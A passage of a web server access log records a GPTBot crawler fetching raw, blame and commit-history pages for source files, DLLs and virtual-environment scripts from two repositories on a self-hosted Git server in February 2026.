9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872694] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42720] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10425] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166027] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17381] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765721] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525775] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:13:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:13:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:13:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15747] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15944] [Gzip 8.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11539] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11552] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13369] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:13:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15911] [Gzip 8.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15307] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:13:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15545] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4330015] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9958] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10419] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 